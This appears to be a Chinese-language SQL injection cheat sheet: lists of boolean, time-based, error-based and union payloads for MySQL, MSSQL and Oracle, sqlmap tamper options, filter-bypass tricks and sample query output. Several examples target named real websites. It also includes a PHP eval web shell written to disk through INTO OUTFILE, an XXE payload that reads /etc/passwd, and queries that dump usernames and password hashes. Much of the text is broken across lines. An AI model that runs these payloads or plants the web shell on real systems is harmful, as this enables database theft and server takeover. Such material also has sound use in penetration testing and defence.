-
http
://
active
.
zol
.
com
.
cn
/
08active
/
lanmo_campus
/
list
.
php
?
city
=
2
-
if
(
1
,
0
,
1
)
基础知识:
MySQL 的 CAST() 和 CONVERT() 函数可用来获取一个类型的值,并产生另一个类型的值。<类型转换>
CAST(value as type); //as
CONVERT(value,type); //,
order by xx {sql} :
,if((1=1),1,(select
1 union select 2))
,if((1=2),1,(select 1 union select 2))
工具的话可以 sqlmap
--suffix ,if((1=1
--prefix
),1,(select 1
union select 2)) --suffix
设置前缀
,if((1=1
//--prefix
设置后缀
),1,(select 1 union select 2))
//--suffix
=======================================================
select xxx( as x)
{sql} from xx :
,case when(1=1)then
1 else (select 1 union select 2) end
,case when(1=2)then 1 else (select 1 union select 2) end
=======================================================
select
* from xxx order by {sql} :
(case when(1=1)
then 1 else (select 1 union select 2) end)
(case when(1=2) then 1 else (select 1 union select 2) end)
or
已存在字段,if((1=1),1,(select 1 union select 2))
已存在字段,if((1=2),1,(select 1 union select 2))
=======================================================
insert
into person (number,name) values (1,'{sql}') :
'+(if((1=1),1,(select
1 union select 2)))+'
'+(if((1=2),1,(select 1 union select 2)))+'
or
'+(case when(1=1)
then 1 else (select 1 union select 2) end)+'
'+(case when(1=2) then 1 else (select 1 union select 2) end)+'
=======================================================
update
xxx set x='{sql}' :
'+(if((1=1),1,(select
1 union select 2)))+'
'+(if((1=2),1,(select 1 union select 2)))+'
or
'+(case when(1=1)
then 1 else (select 1 union select 2) end)+'
=======================================================
'+(case when(1=2) then 1 else (select 1 union select 2) end)+'
update xxx set x=x where xx ='{sql}' :
'+(case when(1=1)
then 1 else (select 1 union select 2) end)+'
'+(case when(1=2) then 1 else (select 1 union select 2) end)+'
=======================================================
select * from xxx
where x in (‘xx’,’{sql}’) :
'+if((1=1),1,(select
1 union select 2))+'
'+if((1=2),1,(select 1 union select 2))+'
rand(true)
rand(FALSE)
1-IF((1=1),1,(SELECT 1 UNION SELECT 2))
1-IF((1=2),1,(SELECT 1 UNION SELECT 2))
DESE,IF((1=1 AND 7053=7053),1,(SELECT 1 UNION SELECT 2)) DESE
DESE,IF((1=1 AND 7053=7054),1,(SELECT 1 UNION SELECT 2)) DESE
{para}'%23
{para}%23
{para} AND 81=81
{para} AND 81=82
{para} AND 1-FALSE
{para} AND 1-TRUE
{para} AND 2-1
{para} AND 2-2
{para} AND 2*3=6
{para} AND 2*3=9
{para} OR 81=81
{para} OR 81=82
{para} AND 1=1X
{para} OR 1=1X
{para} ORDER BY 1-- -
{para} ORDER BY 100-- -
{para} and 1=if((1=1 AND 6607=6607),1,(select 1 union select 2))
{para} and 1=if((1=1 AND 6607=6608),1,(select 1 union select 2))
{para},if((1=1),1,(select 1 from INFORMATION_SCHEMA.SCHEMATA))
{para},if((1=2),1,(select 1 from INFORMATION_SCHEMA.SCHEMATA))
{para}'%2b(if((1=1),1,(select 1 from information_schema.tables)))%2b'
{para}'%2b(if((1=2),1,(select 1 from information_schema.tables)))%2b'
{para},1=if((1=1 AND 5235=5235 ),1,(select 1 union select 2))
{para},1=if((1=2 AND 5235=5235 ),1,(select 1 union select 2))
{para} AND SLEEP(5)
{para} LIMIT 1%23
{para} OR TRUR LIMIT 1%23
{para}' AND SLEEP(5)%23
{para}' AND SLEEP(5) AND 'PYVJ'='PYVJ
{para}'
{para}%df'
{para}''
{para}"
{para}%df"
{para}""
{para}' OR '1
{para}' OR 1-- -
{para}" OR ""="
{para}" OR 1=1-- -
{para}'='
{para}'LIKE'
{para}'=0--+
{para}'or updatexml(1,concat(0x7e,(version())),0) or'
{para}'or extractvalue(1,concat(0x7e,database())) or'
{para} and UpdateXML(1,CONCAT(0x5b,mid((SELECT user()),1,32),0x5d),1)
{para}'+ (UpdateXML(1,CONCAT(0x5b,mid( (select database()) ,1,32),0x5d),1)) +'
{para}'||(true and 1=1) limit 2%23
{para}' AND 3928=3928 AND 'gswx'='gswx
{para}' AND 3928=3929 AND 'gswx'='gswx
{para}" and 12=12 and "kn"="kn
{para}' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0X7C,(SELECT (SELECT VERSION()) FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1),0X7C,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x LIMIT 0,1)a)%23
{para} order by 1,If((1=1),1,(select user from mysql.user))-- -
{para} order by 1,If((1=2),1,(select user from mysql.user))-- -
{para}%' and 1=1 and '%'='
{para}%' and 1=2 and '%'='
{para} 是参数的位置,这样就可以放到burp intruder中进行fuzz了。
注入判断:
or 1=1
or 1=2
and 1=1 数字型
' and '1'='1 字符型
) and (1=1
') and ('1'='1
%' and '%'=' 搜索型
%' and 1=(select 1 from dual) and '%'=' //mysql 和 oracle 中存在 dual 虚拟表
case when 1=1 then 条件 1 else 条件 2 end // 如果条件成立( 1=1 ) 返回条件 1 否则返回条件 2
' and 1=(select case when 1=1 then 1 else 2 end) and '1'='1 //
' and 1=1 and '1'='1
' and 1=2 and '1'='1
' and 1 like 1 and '1' like '1
' and 1 like 2 and '1' like '1
' ||
AND SLEEP(5)
%' and sleep(5) and '%'='
|| = or
&& = and
and 2>1
and 2<1
%0a
' union%a0select version()
bypass.php?id=xxoo'%2b100.union select flag from flag.flag%23
index.php?name= and 1=.1union select flag from flag limit 0,1%23\
%0c = form feed, new page
%09 = horizontal tab
%0d = carriage return
%0a = line feed, new line
%' an%00d 1=1 an%00d '%'='
宽字节: %df'
and 1 in (1)
and 1 in (2)
绕过技巧:
主要是在利用
substr(user(),1,1)
的时候会出现问题。
这里有一个小技巧,以上的语句等价于
substr(user()
from 1 for 1)
,绕过了逗号,就可以继续注入了。
substr(user(),1,1) = substr(user() from 1 for
1)
判断当前用户是否具有写权限;
union select 1,2, file_priv ,4-- // 看返回
example :
-
http
:
//i.178.com/~album.photo.view_thread/id/if(1=1%20and%201=1,2737202,2737201)/uid/105652
如果 条件成立 显示 2737202 的内容 否则 2737201 内容
Sqlmap 使用技巧
--suffix " and '1'='1" // 后缀
--tamper multiplespaces.py --tamper equaltolike.py // multiplespaces.py ( 大空格 tamper('1 UNION SELECT foobar')
'1 UNION SELECT foobar') equaltolike.py ( = 变成 like )
--random-agent
判断注入: like
有时候 = 这些可以用 like 语句
and 1 like 1
and 1 like 2
盲注:
and length(database())=x
and length(user())=1
'XOR(if(ascii(mid(lower(user()),1,1))=21,sleep(5),0))OR'
?vulnerableParam=-99 OR IF((ASCII(MID(({INJECTON}),1,1)) = 100),SLEEP(14),1) = 0 LIMIT 1--
and (select(1)from(select(sleep(5)))a)--+
and (select(1)from(select( if(1=1,sleep(5),0) ))a)--+
%27%2b(select(0)from(select(sleep(length(database()))))a)%2b%27
benchmark(5000000,sha(1))
sleep(5) 两者都可以当延时。
SLEEP(25)--
SELECT BENCHMARK(1000000,MD5('A'));
ProductID=1 OR SLEEP(25)=0 LIMIT 1--
ProductID=1) OR SLEEP(25)=0 LIMIT 1--
ProductID=1' OR SLEEP(25)=0 LIMIT 1--
ProductID=1') OR SLEEP(25)=0 LIMIT 1--
ProductID=1)) OR SLEEP(25)=0 LIMIT 1--
ProductID=SELECT SLEEP(25)--
select concat(char(75),char(76),char(77))
char(115,97,109,103,95,97,100,109,105,110,105,115,116,114,97,100,111,114,101,115)--
手工注入:
mysql> select group_concat(table_name) from
information_schema.tables where tabl
e_schema='yxcms';
+-------------------------------------------------------------------------------
--------------------------------------------------------------------------------
---------------------------------------------------------------------------+
| group_concat(table_name)
|
+-------------------------------------------------------------------------------
--------------------------------------------------------------------------------
---------------------------------------------------------------------------+
|
yx_admin,yx_collectrules,yx_extend,yx_extend_conment,yx_extend_guestbook,yx_ex
tend_product,yx_fragment,yx_group,yx_link,yx_member_group,yx_members,yx_method,y
x_news,yx_order_detail,yx_orders,yx_page,yx_photo,yx_place,yx_sort,yx_tags |
+-------------------------------------------------------------------------------
--------------------------------------------------------------------------------
---------------------------------------------------------------------------+
1 row in set (0.00 sec)
回显注入:
id=1 order by 6 //
判断字段数
id=1 and 1=2 union select 1,2,3,4,5,6 //找出回显位
id=1 and 1=2 union select 1,2,user(),database(),5,6 //简单获取一些系统信息
id=1 and 1=2 union select 1,2,group_concat(table_name),4,5,6
from
information_schema.tables where table.schema=16
进制的当前数据库 //获取表名
id=1 and 1=2 union select 1,2,group_concat(column_name),4,5,6 from
information_schema.columns where table_name=16
进制的表名 //获取字段名
id=1 and 1=2 union select 1,2,group_concat(username,0x3a,password),4,5,6 from 表名 //获取字段内容
附常用敏感函 数:user(),database(),@@basedir,@@tmpdir,version(),@@datadir,@@general_log_file,@@hostname,@@plugin_dir,@@port,@@global.version_compile_os
select
group_concat(table_name) from information_schema.tables where
table.schema=0xxxx //
获取表
select
group_concat(table_name) from information_schema.tables where
table_schema=0x695F3439796F75 //
获取表
select
group_concat(column_name) from information_schema.columns where
table_name=0xxxxx //
获取字段
select
group_concat(username,0x3a,password) from
表名
报错注入:
一、floor
mysql> select * from ad where id=1;
+----+---------+------+
| id | sanerwu | zimu |
+----+---------+------+
| 1 | | 1 |
+----+---------+------+
1 row in set (0.00 sec)
mysql> select * from ad where id=1
and (select 1
from (select count(*),concat(v
ersion(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.5.321' for key 'group_key'
报其他的只需要把version()函数改掉即可例如:
mysql> select * from ad where id=1
and (select 1
from (select count(*),concat(u
ser(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'root@localhost1' for key 'group_key'
二、updatexml
mysql> select * from ad where id=1
and 1=(updatexml(1,concat(0x5e24,(select
vers
ion() limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$5.5.32^$'
mysql> select * from ad where id=1
and
1=(updatexml(1,concat(0x5e24,(select pass
from maixiao limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$21232f297a57a5a743894a0e4a801f'
三、exractvalue
mysql> select * from ad where id = 1 and extractvalue(1, concat(0x5c,(select
ver
sion())));--
ERROR 1105 (HY000): XPATH syntax error: '\5.5.32'
mysql> select * from ad where id = 1 and extractvalue(1, concat(0x5c,(select
use
r from maixiao limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\21232F297A57A5A743894A0E4A801FC'
四、数据类型
mysql> select 1E308*if(x,2,2) from(select version()x)y;
ERROR 1690 (22003): DOUBLE value is out of range in '(1E308 *
if('5.5.32',2,2))'
mysql> select 1E308*if((select*from(select version())x),2,2);
ERROR 1690 (22003): DOUBLE value is out of range in '(1E308 * if((select
'5.5.32
' from dual),2,2))'
mysql> select 1E308*if((select*from(select*from maixiao)a limit 1)>(select*from
maixiao limit 1),2,2);
ERROR 1690 (22003): DOUBLE value is out of range in '(1E308 * if(((select
'1','2
1232F297A57A5A743894A0E4A801FC3','21232f297a57a5a743894a0e4a801fc3','\057E'
五、幂运算
mysql> select * from admin;
+------+--------+
| id | pass |
+------+--------+
| 1 | 123456 |
+------+--------+
1 row in set (0.00 sec)
mysql> select * from admin where id=1 and
EXP(~(select*from(select user())a));
ERROR 1690 (22003): DOUBLE value is out of range in
‘exp(~((select ‘root@localhost’ from dual)))’
延时注入:
select if(length(user())>4,sleep(5),1) //
判断长度
select if(ascii(mid(user(),1,1))>60,sleep(5),1) //逐位判断ascii码,再转换为字符
select * from users where id ='1' union select if(ascii(mid((select user from
mysql.user limit 1),1,1))>1,sleep(5),1),2,3;
floor 报错
group by concat(version(),floor(rand(0)*2)) having min(0)
and (select 1 from (select count(*),concat( version() ,floor(rand(0)*2))x from information_schema.tables group by x)a);
mysql> select * from ad where id=1;
+----+---------+------+
| id | sanerwu | zimu |
+----+---------+------+
| 1 | | 1 |
+----+---------+------+
1 row in set (0.00 sec)
mysql> select * from ad where id=1 and (select 1 from (select
count(*),concat(v
ersion(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.5.321' for key 'group_key'
and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat(( version() ),floor(rand(0)*2)));
and (select count(*) from (select 1 union select null union select !1)x group by concat(( select table_name from information_schema.tables limit 1 ),floor(rand(0)*2)));
ExtractValue
and extractvalue(1, concat(0x5c, ( select table_name from information_schema.tables limit 1 )))--+
and extractvalue(1, concat(0x5c, ( select @@version )))--+
UpdateXml
and 1=(updatexml(1,concat(0x3a,(select user())),1))
and 1=(updatexml(1,concat(0x3a,( version() )),1)) // and 1=(updatexml(1,concat(0x3a,(select version())),1))
or updatexml(1,concat(0x3a,(select user())),0)#
if(1=1,1,(select 1 from information_schema.tables))
if(1=2,1,(select 1 from information_schema.tables))
-
http
:
//www.wooyun.org/whitehats/loopx9
limit 后的注入:
SELECT * FROM test limit 0,1 procedure analyse (extractvalue(rand(),concat(0x3a,(select password from mysql.user limit 0,1))),1)
参考资料:
-
http
:
//zone.wooyun.org/content/18220
order by 注入:
实例:通过mid 或者 substr 截取单个字符,然后转换成ascii
currChainID=1534&sortType=c.DAILY_LINE+desc ,if((ascii(substr(database(),1,1))>98),1,(select+1+from+information_schema.tables)) &itemName=&workCode=90000
这一句 if((ascii(substr(database(),1,1))>98),1,(select+1+from+information_schema.tables)) 理解
如果ascii > 98 则为1,否则 否则为 select+1+from+information_schema.tables
如果是报错注入,利用报错更快的得到数据库名
currChainID=1534&sortType=c.DAILY_LINE+desc ,if((ascii(substr(database(),1,1))>100),1,(select 1 from information_schematables )) &itemName=&workCode=90000
这里是故意写错,可直接报错。
currChainID=1534&sortType=c.DAILY_LINE+desc ,if((ascii(substr(database(),1,1))>100),1,(select 1user())) &itemName=&workCode=90000
写shell :
win <?php eval($_REQUEST[cmd]);?> => 0x3c3f706870206576616c28245f524551554553545b636d645d293b3f3e
|
select 0x3c3f706870206576616c28245f524551554553545b636d645d293b3f3e into outfile 'e://appserv//www//91ri.org//modules//wordpress//app.php' ; |
linux
select 0x3c3f706870206576616c28245f524551554553545b636d645d293b3f3e into outfile '/var/www/cmd.php';
payloads-sql-blind-MSSQL-INSERT.txt
payloads-sql-blind-MSSQL-WHERE.txt
payloads-sql-blind-MySQL-INSERT.txt
payloads-sql-blind-MySQL-WHERE.txt
payloads-sql-blind-MySQL-ORDER_BY.txt
[mssql]
select db_name(0)
convert(int,system_user)
convert(int,db_name(0)) // 里面的数字可以更改,达到获取所有数据库名
and substring(lower(system_user),1,1)='w'
if (ascii(substring(system_user,%s,1))=%s) waitfor delay '0:0:3' --
'); waitfor delay '0:0:1' --
[mysql]
-1 OR length(user())=23 AND 1=1%20--%20
if(ascii(mid(lower(user()),1,1))=100,benchmark(2000000,md5(1)),0) // 延时
if(ascii(mid(lower(user()),1,1))=100,sleep(5),0)
aaa"XOR(if(now()=sysdate(),sleep(0),0))OR"bb // 延时
aa' xor(if(1=1,sleep(2),0))or 'bb
aa'xor(sleep(1))or'bb
substr(user(),1,1) = substr(user() from 1 for 1)
and 2*3=6 and 2-1=1// 有时 and 1=1 拦截可考虑用
'and(sleep(1))and'1
if(ascii(mid(lower(user())from(%s)for(1)))=%s,sleep(3),0)
(select(0)from(select(sleep(if(length(user())=21,5,0))))v)
//sign 符号函数
mysql> SELECT SIGN(-32); -> -1
mysql> SELECT SIGN(0); -> 0
mysql> SELECT SIGN(234); -> 1
-
http
:
//wooyun.org/bugs/wooyun-2010-086516
sleep(1-abs(sign(ascii(mid(lower(user())from(%s)for(1)))-%s))) // 如果sleep(1) 说明ascii正确
//sleep(1)
sleep(1=1)
sleep('a'='a')
xxx= admin'='1' or length(user())=x or '1'='1
1' OR 1 GROUP BY CONCAT(0x5e5e,(SELECT user()),0x5e5e,FLOOR(RAND(0)*2)) HAVING MIN(0)#
不带逗号注入:
aa"+EXP(~(select * from (select user())a))+"bb
select group_concat(schema_name) from information_schema.schemata;
[ORACLE]
ascii(substr(SYS_CONTEXT('USERENV','CURRENT_USER'),%s,1))=%s // 截取字符
-
http
:
//wooyun.org/whitehats/lijiejie/type/1/page/10
[XML] 实体注入
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE copyright [
<!ENTITY test SYSTEM "file:///etc/passwd">
]>
<message>
<tradeId>ActiveMember</tradeId>
<timestamp>20140915144621</timestamp>
<nPartnerID>1</nPartnerID>
<mebId>998</mebId>
<sActiveCode>KUEe+OyzVKfn8lABdn3itt1OO3zoBtHVkilQgT5WXbUg8lK+EqR+172Rk/RNb/+km2z8sD7nEZD4tR+IsLZkGRJhi9JrUJUart4SliGUbWSlbnhQPEfpLrFEEybAx9RuObcVjcbYkkx6Rl91v4vAwOhlfHENvAwHmwY4X1zR1HA=</sActiveCode>
<eSource>Mobile</eSource>
</message>
Mysql Bypass
ascii range : 32 - 126
bin 函数 :返回二进制n的一个字符串
select bin(97) ;
mysql> select bin(97);
+---------+
| bin(97) |
+---------+
| 1100001 |
+---------+
1 row in set (0.00 sec)
>> : 重右至左 0 1 2 3 4 5 6
mysql> select bin(97);
+---------+
| bin(97) |
+---------+
| 1100001 |
+---------+
1 row in set (0.00 sec)
mysql> select bin(97>>2);
+------------+
| bin(97>>2) |
+------------+
| 11000 |
+------------+
1 row in set (0.00 sec)
mysql> select bin(97>>3);
+------------+
| bin(97>>3) |
+------------+
| 1100 |
+------------+
1 row in set (0.00 sec)
conv 函数: 转换进制
mysql> select bin(111);
+----------+
| bin(111) |
+----------+
| 1101111 |
+----------+
1 row in set (0.00 sec)
mysql> select conv('1101111',2,10);
+----------------------+
| conv('1101111',2,10) |
+----------------------+
| 111 |
+----------------------+
1 row in set (0.00 sec)
mysql> select substr(bin(97>>7),-1,1);
+-------------------------+
| substr(bin(97>>7),-1,1) |
+-------------------------+
| 0 |
+-------------------------+
1 row in set (0.00 sec)
+++++++++++++++++++++++++++++++++++
fuzz:
<?php
$link = mysql_connect("localhost","root","123456");
for($i=0;$i<=255;$i++){
$sql = "select 1 from dual where 1".chr($i)."=1";
$query = mysql_query($sql);
if($query){
echo $i.":0x".dechex($i).":".chr($i)." ->".$sql."<br>";
}
}
%09 ->select 1 from dual where 1 =1
%0a ->select 1 from dual where 1 =1
%0b
->select 1 from dual where 1
=1
%0c ->select 1 from dual where 1 =1
%0d ->select 1 from dual where 1 =1
%a0 ->select 1 from dual where 1?=1
%20 ->select 1 from dual where 1 =1
0x2e:. ->select 1 from dual where 1.=1
<?php
$link = mysql_connect("localhost","root","123456");
mysql_select_db("mysql");
for($i=0;$i<=255;$i++){
$sql = "select 1 from".chr($i)."user where 1=1";
$query = mysql_query($sql);
if($query){
echo $i.":0x".dechex($i).":".chr($i)." ->".$sql."<br>";
}
}
0x9: ->select 1
from user where 1=1
0xa: ->select 1 from user where 1=1
0xb:
->select 1 from
user where 1=1
0xc: ->select 1 from user where 1=1
0xd: ->select 1 from user where 1=1
0x20: ->select 1 from user where 1=1
0xa0:? ->select 1 from
爑ser where 1=1
